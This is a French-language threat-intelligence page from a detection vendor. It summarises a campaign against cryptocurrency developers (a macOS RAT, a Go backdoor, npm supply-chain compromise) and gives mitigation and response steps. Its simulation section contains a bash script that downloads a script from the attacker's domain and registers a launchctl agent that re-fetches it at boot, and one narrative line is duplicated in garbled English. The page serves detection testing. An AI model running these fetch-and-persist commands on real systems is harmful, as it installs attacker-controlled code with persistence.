SOC Prime Bias: Critique

29 May 2026 07:25 UTC
newspaper icon wiz.io

Infrastructure de Développement de Logiciel Crypto Ciblée par un Nouvel Acteur de Menace

Author Photo
SOC Prime Team linkedin icon Suivre
Infrastructure de Développement de Logiciel Crypto Ciblée par un Nouvel Acteur de Menace
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Résumé

Un acteur de menace motivé financièrement, identifié sous le nom de JINX-0164, cible les développeurs de cryptomonnaie via l’ingénierie sociale sur LinkedIn, des malwares macOS, et des compromissions CI/CD. Le groupe déploie un RAT Python personnalisé connu sous le nom de AUDIOFIX et une porte dérobée basée sur Go appelée MINIRAT, toutes deux configurées pour communiquer avec des domaines de commande et contrôle codés en dur. Après avoir obtenu l’accès, les attaquants volent les identifiants de cloud et de développement, altèrent les dépôts de code, et publient même des paquets npm malveillants pour étendre l’accès et permettre le vol de cryptomonnaie. La campagne reflète une menace sophistiquée de la chaîne d’approvisionnement visant le cycle de vie du développement logiciel.

Enquête

Wiz CIRT a suivi l’intrusion depuis le premier contact LinkedIn jusqu’à la livraison des liens malveillants, l’exécution des charges utiles macOS, le vol de crédentiels, et le déplacement latéral dans les référentiels de code source. Leur enquête a révélé des scripts déployeurs, la persistance via launchctl, et l’utilisation de l’outil nord-stream pour l’exfiltration discrète. Les chercheurs ont également identifié plusieurs domaines usurpés, des nœuds de sortie VPN, et une compromission de la chaîne d’approvisionnement impliquant le paquet @velora-dex/sdk npm. Des chemins de fichiers, des hachages, des domaines et des adresses IP ont été recueillis pour soutenir la détection et la chasse aux menaces.

Atténuation

Les défenses recommandées incluent la surveillance des systèmes macOS pour launchctl la persistance, la détection des LaunchAgents suspects, et le blocage des domaines malveillants et des serveurs de commande et contrôle connus. Les organisations devraient imposer des validations signées, activer le mode vigilant GitHub et surveiller les validations non vérifiées ou les changements inhabituels de flux de travail CI/CD. L’utilisation de VPN devrait être limitée aux fournisseurs approuvés, et l’authentification multifactorielle devrait être requise pour les comptes cloud et les plateformes de développement.

Réponse

Si cette activité est détectée, isolez immédiatement le système macOS affecté, collectez les artefacts forensiques, et révoquez tout identifiant et jeton API compromis. Les équipes de sécurité doivent effectuer un examen complet des dépôts de code pour les validations malveillantes et supprimer tout paquet npm compromis. Les domaines de commande et contrôle identifiés devraient être bloqués, et les règles de pare-feu mises à jour pour refuser le trafic vers les adresses IP malveillantes. Les parties prenantes concernées devraient être notifiées, et le partage de renseignements sur les menaces avec des partenaires de confiance du secteur devrait être envisagé.

Flux d’attaque

Nous sommes encore en train de mettre à jour cette partie. Inscrivez-vous pour être informé

Prévenez-moi

Exécution de simulation

Pré-requis : La vérification du télémesure et de la ligne de base de pré-vol doit avoir réussi.

Rationale : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer exactement la télémétrie attendue par la logique de détection.

  • Narratif d’attaque & Commandes :

    1. Porte d’entrée initiale : Un attaquant envoie un email de phishing contenant un lien malveillant (T1566.004). La victime clique sur le lien, qui pointe vers https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh.
    2. Téléchargement de charge utile : Le terminal de la victime exécute une commande curl qui récupère silencieusement le script.
    3. Configuration de la persistance : Le script enregistre un agent de lancement en utilisant launchctl submit, intégrant la même commande afin que la charge utile soit re-téléchargée à chaque démarrage (T1546.006). curl command so the payload is re‑downloaded on each boot (T1546.006).
    4. Exécution : L’agent de lancement s’exécute avec des privilèges système, exécutant le script téléchargé pour compromettre l’hôte.

  • Script de test de régression : (à exécuter sur une machine de test macOS ; nécessite les droits administrateur)

    #!/bin/bash
set -euo pipefail

# 1. Simuler le téléchargement curl malveillant (aucun code malveillant réel)
MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh"
curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh

# 2. Enregistrer un agent de lancement qui re-télécharge le script au démarrage
launchctl submit -l com.malicious.audiofix 
    -p /usr/bin/curl -a -c 
    -t "30" 
    /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh

echo "Agent de lancement malveillant enregistré. Vérifiez le SIEM pour la détection."

  • Commandes de nettoyage :

    # Supprimez l'agent de lancement
launchctl remove com.malicious.audiofix || true

# Supprimez le script téléchargé
rm -f /tmp/audio-fix.sh

echo "Nettoyage terminé."

Fin du rapport

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement